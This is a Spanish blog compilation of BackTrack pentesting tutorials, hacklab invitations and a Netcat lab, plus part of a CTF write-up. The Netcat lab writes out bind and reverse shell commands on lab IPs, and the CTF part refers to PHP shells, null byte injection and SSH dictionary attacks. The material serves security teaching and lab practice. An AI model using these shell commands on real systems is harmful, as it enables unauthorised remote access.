Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: Securinf; en este evento participé con dos conferencias: Análisis de Malware sobre windows y un WorkShop de BackTrack.

El objetivo de este post es publicar los video tutoriales que presenté ese día. Aunque son muy cortos y básicos pueden servir para quienes recién inician en este campo de la seguridad mediante el uso de la distribución BackTrack. También debe tenerse en cuenta que estos los realicé exclusivamente para un workshop, por lo tanto no tienen audio, pues están pensados en ir mostrando la herramienta e ir explicando su funcionamiento y configuración en vivo. Haré una recopilación de lo publicado hasta el momento sobre los laboratorios de BackTrack y luego los enlaces de descarga con una pequeña descripción de los videos presentados en la conferencia.

Video Tutorial BackTrack, Introducción y Conceptos Básicos

Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios

Video Tutorial: Instalación de BackTrack 4 (Pre-Final)

Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)

Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)

——————————————————————————————————————————————————————————–

Videos del WorkShop de Backtrack:

01- Booteo BackTrack (Creación y configuración de una máquina virtual en VirtualBox – Booteo inicial de BackTrack)

02 – Ejecución inicial de BackTrack (Inicio del servicio de red, Inicio del servidor X, Cambio de contraseña, Rápido recorrido por el menú K)

03 – Recorrido por los directorios de herramientas contenidas en BackTrack -Web, Wireless, Passwords, Cisco, etc. Ejecución de servicios disponibles en BackTrack – HTTP, VNC, TFPT, etc.

04 – Escaneo e identificación  de puertos y servicios con Nmap en BackTrack.

05 – Escaneo automatizado de nuestra red con la herramienta AutoScan en BackTrack.

06 – Information Gathering/Footprinting con Maltego en BackTrack.

07 – Introducción al análisis básico de ejecutables con OllyDbg en BackTrack.

08 – Identificación de cifrados utilizados en la web con BackTrack.

09 – Escaneo e identificación de directorios y archivos sensibles en servidores web con DirBuster en BackTrack.

10 – Identificación del servidor Web con netcat y httprint.

11 – Escaneo e identificación de directorios y archivos sensibles en servidores Web con Nikto (BackTrack) y Wikto (Windows).

12 – Spidering con Wget en BackTrack.

13 – Xhydra y John The Ripper en BackTrack.

Quinto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.

En este Video tutorial veremos como llevar a cabo la instalación básica de VMWare WorkStation en BackTrack.

Resumen:

• Descarga de aplicativo VMWare WorkStation (www.vmware.com/downloads).
• Ejecución de del archivo de instalación (sudo sh vmware_versión.bundle).
• Ejecución de VMWare WorkStation y el proceso de VMWare Kernel Module Updater.

Descargar video tutorial: Instalación de VMWare WorkStation en BackTrack (Password: www.dragonjar.org)

Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.

En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet.

Resumen:

• Ejecución de la instrucción start-network.
• Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#).
• Configuración manual:
  • ifconfig interfaz IP
  • route add default gw IP_gw
  • echo nameserver IP_gw > /etc/resolv.conf

Descargar video tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final) (Password: www.dragonjar.org)

Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.

En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo).

Resumen:

• Booteo de BackTrack.
• Ejecución de ubiquity.
• Particionamiento.

Descargar video tutorial: Instalación de BackTrack 4 (Pre-Final) (Password: www.dragonjar.org)

Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.

En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye.

Resumen:

• Descarga de BackTrack y grabación de la imagen.
• Booteo de BackTrack.
• Interfaz Gráfica de BackTrack.
• Directorios de BackTrack.

Descargar video tutorial BackTrack: booteo, interfaz gráfica y directorios (Password: www.dragonjar.org)

La idea será llevar a cabo y en modo de video tutoriales el contenido que había anunciado en este post (Contenido y Recursos).

En este primer video tutorial haremos un completa introducción a BackTrack y los conceptos básicos que ella abarca.

Resumen:

• Introducción a BackTrack (Distribución GNU/Linux – LiveCD/DVD/VMWare)
• Definiciones /Conceptos Básicos (Repositorios de herramientas)
• Categorías / Herramientas / Fases (Enumeration, Web Applications, Fuzzers, etc / Meta Packages)
• Enlaces de descarga / Más información

Descargar video tutorial de BackTrack, Introducción y Conceptos Básicos (Password: www.dragonjar.org)

El siguiente Cheat Sheet proporciona diversas instrucciones de ejemplo sobre el uso de la herramienta Netcat sobre diferentes Sistemas Operativos.

Contenido:

• Fundamental Netcat Cliente
• Netcat Command Flags
• Netcat Relays on Windows
• File Transfer
• TCP Port Scanner
• TCP Banner Graber
• Backdoor Shells
• Netcat Relays on Linux

Descargar Cheat Sheet de Netcat PDF (Password: www.dragonjar.org)

Este Cheat Sheet fué desarrollado y publicado por la SANS.

De este entorno ya se ha hablado mucho en la web, por ello prefieron dejar los enlaces a más información al respecto, incluso los enlaces a los videso que publiqué sobre el desarrollo del mismo.

SecGame #1: Sauron

Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)

Solución del HackTaller 01 DragonJAR (II de VIII)

Solución del HackTaller 01 DragonJAR (III de VIII)

Solución del HackTaller 01 DragonJAR (V de VIII)

Solución del HackTaller 01 DragonJAR (VI de VIII)

“Rooteo” a Sauron, solución alternativa

La idea es que a este Hack Lab puedan asistir las personas que se quedaron sin cupo en el anterior o que por uno u otro motivo no pudieron asistir.

La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.

El escenario propuesto para este Test de Penetración es el siguiente:

Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.

El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.

4v4t4r @ gmail . com

Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.

- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (Descargar imágen de máquina virtual BackTrack 3)
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)
- Cuaderno de notas
– Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc…) INDISPENSABLE!!!
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:

- Desarrollo del Laboratorio Virtual – Test de Penetración 1
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los ambientes virtuales de intrusión en Windows
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los Ambientes Virtuales de Intrusión en Linux
- Desarrollo del Laboratorio Virtual – Test de Penetración – Escaneo e identificación del Sistema
- Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking
- Desarrollo del Laboratorio Virtual – Test de Penetración – Acceso a la Información Interna

Fecha: Sabado 21 de Febrero de 2008
Hora: 2:00 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Cupos limitados: +/- 15 personas

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.

Descargar video tutorial de instalación de BackTrack 4 Beta en el disco duro (Password: www.dragonjar.org)

Recuerda estudiar los diferentes recursos publicados relacionados con la distribución BackTrack y los Test de Penetración.

La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.

El escenario propuesto para este Test de Penetración es el siguiente:

Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.

Nuevamente se harán algunas definiciones necesarias y relacionadas en lo que yo llamo el arte de los Test de Penetración, para realizar de manera guiada el mismo.

El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.

4v4t4r @ gmail . com

Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.

- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (Descargar imágen de máquina virtual BackTrack 3)
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)
- Cuaderno de notas
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc…)
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:

- Desarrollo del Laboratorio Virtual – Test de Penetración 1
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los ambientes virtuales de intrusión en Windows
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los Ambientes Virtuales de Intrusión en Linux
- Desarrollo del Laboratorio Virtual – Test de Penetración – Escaneo e identificación del Sistema
- Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking
- Desarrollo del Laboratorio Virtual – Test de Penetración – Acceso a la Información Interna

Fecha: Sabado 14 de Fecbrero de 2008
Hora: 2:00 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Cupos limitados: +/- 15 personas

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo… ya el que me quiera llevar cositas no me enojo XD.

En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.

Con esta sesión damos por terminado el “resumen” de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos

Descargar video tutorial Test de Penetración – Acceso a la Información sensible (Password: www.dragonjar.org)

Sin lugar a dudas el servicio de SSHD – Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.

En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.

Descargar video tutorial de Test de Penetración – System Hacking (Password: www.dragonjar.org)

Este será llevado a cabo el próximo sabado 20 de diciembre – 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US & Canada)

Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.

4v4t4r @ gmail . com

La temática para este primer laboratorio virtual es la siguiente:

Test de Penetración 1 (Introducción y Desarrollo)

La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.

Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.

Escenario propuesto:

El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.
———-

De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan .

Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.

La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.

Descargar Máquina Virtual BackTrack 3 (Desarrollada por Bagside)

Ahora publico el sistema que será objeto del Test de Penetración.

Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb

La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).

El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.

Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.

Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos

Textos e información de interés:

http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap
http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi

Muchas aplicaciones tienen vulnerabilidades y estrategias de ataque conocidas, que pueden ser explotadas para conseguir control remoto o explotación de los datos de la aplicación.

Además, muchas aplicaciones están a menudo mal configuradas o sin actualizar, debido a la impresión de que solo se usan “internamente”, y por tanto no representan ninguna amenaza.

Con la proliferación de servidores web virtuales, la tradicional relación de una dirección IP con un servidor web 1 a 1 ha ido perdiendo su significado original. No es nada raro tener múltiples sites y aplicaciones web cuyos nombres resuelvan a la misma dirección IP (este escenario no se limita a entornos de hosting, también aplica a entornos corporativos).

Nmap:

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos TCP y UDP atribuido a Fyodor. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática. (Más información…)

El siguiente video tutorial muestra el proceso de descubrimiento básico de aplicaciones con Nmap.

Link:

Descargar video tutorial de descubrimiento de aplicaciones con Nmap (Password: www.dragonjar.org)

Actualmente existen multitud de vendedores y de versiones de servidores web en el mercado. Saber el tipo exacto de servidor que estás comprobando ayuda considerablemente en el proceso de testing, y puede cambiar el curso de las pruebas. Esta información puede inferirse mediante el envío de comandos específicos al servidor web y posteriormente analizar su respuesta, ya que cada versión del software de servidor web puede responder de forma diferente a un mismo comando. Sabiendo la respuesta de cada tipo de servidor web ante comandos específicos y almacenando dicha información en una base de datos de firmas web, la persona a cargo de las pruebas de intrusión, puede enviar esos comandos al servidor web, analizar la respuesta y compararla a la base de datos de firmas conocidas.

La forma más básica y sencilla de identificar un servidor Web es comprobar el campo Server en la cabecera de respuesta HTTP.

Encontrar que aplicaciones específicas se encuentran instaladas en un servidor web es un elemento esencial en un test de vulnerabilidades de una aplicación web. Muchas aplicaciones tienen vulnerabilidades y estrategias de ataque conocidas, que pueden ser explotadas para conseguir control remoto o explotación de los datos de la aplicación. Además, muchas aplicaciones están a menudo mal configuradas o sin actualizar, debido a la impresión de que solo se usan “internamente”, y por tanto no representan ninguna amenaza.

Netcat:

Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). (Más información…)

Httprint:

Httprint, de Net-Square, es un programa gratuito (no GPL) que utiliza técnicas de fuzzing para dar una estimación de la versión de servidor web que se ejecuta en un puerto. Realiza un cálculo con determinados tests pra crear una huella(fingerprint) del servidor y compararla con una base de datos de los mismos. (Más información…)

Netcraft:

Netcraft es una herramienta online para saber información sobre el host de una determinada pagina. (servidor web, nameserver, registrador, disponibilidad) (Más información…)

Live HTTP headers:

Esta extensión para el navegador Mozilla Firefox tiene una funcionalidad muy concreta: mostrar las cabeceras HT que se cargan al navegar por Internet, y añadir además diversos datos extra interesantes. (Más información…)

El siguiente video tutorial muestra algunos métodos utilizados para determinar la firma digital de aplicaciones web. Caso concreto el tipo y versión del servidor web haciendo uso de Netcat, Httprint, Live HTTP headers y Netcraft.

Link:

Descargar video tutorial de pruebas de firma digital de aplicaciones Web. (Password: www.dragonjar.org)

Dejo a continuación una corta definición y el enlace para más información en esta misma página de laboratorios sobre BackTrack.

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.

Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org

(Más información sobre BackTrack)

Ahora publico un video tutorial que he realizado sobre la instalación de BackTrack 3 como sistema base de nuestra máquina.

Descargar video tutorial de instalación de BackTrack 3 en disco duro (Password: www.dragonjar.org)

Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.

Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (Más información – Web Oficial)

En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.

Algunas de estas razones pueden ser:

• Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).
• Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).
• Cuando necesitamos conectarnos a un servicio de red de manera manual.

El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la “Guía definitiva de Netcat”, si nos acercará un poco más a la misma.

Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:

Laboratorios: Hacking – Técnicas y contramedidas – Identificación de Banner’s (Banderas) I
Laboratorios: Hacking – Técnicas y contramedidas – Scanning II
Solución del HackTaller 01 DragonJAR (II de VIII)
Solución del HackTaller 01 DragonJAR (III de VIII)

Ayudas y Opciones de Comandos

Nota: Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.

Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:

nc -h

Para lo cual obtendremos el siguiente resultado:

nc -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]

Identificación de Banners e información

Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:

nc -vv IP/HostName Puerto

Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.

Consultando el Servidor Web que gestiona un sistema Objetivo

Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:

nc -vv IP/HostName Puerto

Netcat a la escucha sobre puertos TCP/UDP y Chat

Establecer a Netcat en modo “listen” (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.

Vamos como establecer a Netcat en modo “listen” (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo “listen”, veamos:

nc -lvv 12345

El cliente será el sistema Windows

Transferencia de Archivos con Netcat

Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

Debemos ejecutar la siguiente sintaxis:

nc -lvp 12345 > salida.txt

El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:

El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.
para ello primero crearemos el archivo de texto a enviar. Veamos:

Así se vería desde el servidor BackTrack cuando recibe los datos

Luego procedemos a comprobar la información contenida en el envío

Administración Remota con Netcat (Shell)

Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.

Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.

nc -lvp 12345 -e cmd.exe

Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:

nc -v 10.30.3.116 12345

Shell Inversa con Netcat

A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo “listen” y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo “Listen”.

Desde Windows se establece el modo Listen:

nc -lvp 12345

Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:

nc -v 10.30.3.116 12345 -e /bin/bash

Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.

Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes .

A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.

Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:

Crysol
Netcat en la Wikipedia
Web Oficial de Netcat

Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 5 publicado por SG6 Labs:

Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR (SecGame: Sauron)(password: www.dragonjar.org).

Herramientas necesarias:

BackTrack, Shell PHP (en nuestro caso, C99), John The Ripper,

Palabras claves (Documentos de interés, Definiciones):

Servidor Web – Apache – .HTACCESS – Comandos habituales en Linux – PHP – Vulnerabilidades – Shell, Shell PHP, Null Byte Injection

El nivel 5 es quizá uno de los momentos menos concretos de todos los que se pueden presentar. Ahora hemos conseguido ser usuarios locales del sistema, podemos ejecutar comandos, leer directorios, ver configuraciones, y podemos, en definitiva, explorar muchísimas posibilidades.

Sin embargo, hay que matizar algo importante, que puede servir para ahorrarnos muchas horas de trabajo inútil: si nos encontramos en un sistema actualizado, sin fallos de seguridad en el kernel y en otros servicios administrativos, es muy difícil, a menos que el administrador haya configurado algo de forma errónea, escalar privilegios directamente, hacia un usuario administrativo. ¿Qué podemos hacer entonces en estas situaciones?

Nuestro objetivo, en estos casos en los que ser “root” o “Administrador” no parece ser inmediato, será extraer la mayor cantidad de información del sistema, obtener el mayor número de cuentas de usuario posibles, etc.

¿Cómo conseguir eso?

Primeramente, en los sistemas que tengan servicios web, nos centraremos en estos, ¿por qué?. Básicamente porque el aislamiento entre usuarios web, es quizá no complicado, pero sí tedioso. Es fácil encontrar escenarios en los que directamente podamos acceder a los directorios de otros usuarios en la web, y leer sus ficheros, porque todas estas carpetas pueden ser leídas por el usuario que ejecuta el servidor web ( apache, httpd, etc ). En otros escenarios los usuarios web estarán aislados usando cgi-wrappers. Y únicamente, en los entornos más avanzados y seguros, cada usuario web poseerá una máquina virtual o un vps, en la que sólo existirá él. En caso de no existir escenario web, otros escenarios posibles son por este orden: ficheros de configuración, ficheros temporales, ficheros de logs y permisos inseguros.

En este escenario que nos ocupa, relativamente común en un entorno de seguridad medio con árbol web (incluso muy común en granjas de servidores web), vamos a ver cómo se puede proceder. Lo primero, saber quiénes son los usuarios.

blindware:x:500:500::/var/www/blindware:/bin/bash
intranet:x:501:501::/var/www/intranet:/bin/bash
developer:x:502:502::/home/developer:/bin/bash

El sistema parece tener 3 usuarios. 2 de ellos, usuarios web, uno de los cuales es el usuario con el que podemos ejecutar comandos, y otro es el usuario “intranet”.

Podemos probar a acceder al directorio del usuario intranet (/var/www/intranet), pero rápidamente nos daremos cuenta, que poco podemos hacer, pues nos deniega el acceso. Incluso si intentamos leer /var/www, obtendremos resultado parecido, puesto que sus permisos son los siguientes:

d–x–x–x 8 root root 4096 May 12 13:52 www

Ésta situación es bastante común, sin embargo, hay un fichero en el sistema que nos será siempre de gran utilidad, y es la configuración del propio Apache, la cual habitualmente se encuentra desprotegida (en este caso dentro de /etc/httpd/httpd.conf).

<VirtualHost *:80>
ServerAdmin blindware@blindware.inc
DocumentRoot /var/www/blindware/htdocs
ServerName www.blindware.inc
SuexecUserGroup blindware blindware
<Directory />
Options Indexes SymLinksIfOwnerMatch ExecCGI
AllowOverride All
</Directory>
</VirtualHost>

<VirtualHost *:80>
ServerAdmin intranet@blindware.inc
